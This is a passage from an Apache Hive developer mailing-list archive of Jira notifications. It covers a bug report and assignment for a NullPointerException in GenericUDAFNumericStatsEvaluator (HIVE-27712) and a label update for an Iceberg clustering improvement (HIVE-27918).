> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> using Hadoop 3.3.4
> Hive 3.1.3
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a sql with groupby execution and join execution, I got a 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Assigned] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE

2023-11-30 Thread liang yu (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

liang yu reassigned HIVE-27712:
---

Assignee: liang yu

> GenericUDAFNumericStatsEvaluator throws NPE
> ---
>
> Key: HIVE-27712
> URL: https://issues.apache.org/jira/browse/HIVE-27712
> Project: Hive
>  Issue Type: Bug
>Reporter: liang yu
>Assignee: liang yu
>Priority: Major
> Attachments: image-2023-09-19-16-33-49-881.png
>
>
> using Hadoop 3.3.4
> Hive 3.1.3
> when I set the config:
> {code:java}
> set hive.groupby.skewindata=true;
> set hive.map.aggr=true; {code}
> and execute a sql with groupby execution and join execution, I got a 
> NullPointerException below:
>  
> !image-2023-09-19-16-33-49-881.png!



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Updated] (HIVE-27918) Iceberg: Push transforms for clustering during table writes

2023-11-30 Thread ASF GitHub Bot (Jira)


 [ 
https://issues.apache.org/jira/browse/HIVE-27918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

ASF GitHub Bot updated HIVE-27918:
--
Labels: pull-request-available  (was: )

> Iceberg: Push transforms for clustering during table writes
> ---
>
> Key: HIVE-27918
> URL: https://issues.apache.org/jira/browse/HIVE-27918
> Project: Hive
>  Issue Type: Improvement
>Reporter: Sourabh Badhya
>Assignee: Sourabh Badhya
>Priority: Major
>  Labels: pull-request-available
>
> Currently transformed columns (except for bucket transform) are not pushed / 
> passed as clustering columns. This can lead to incorrect clustering on such 
> columns which can lead non-performant writes.
> Hence push transforms for clustering during table writes.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)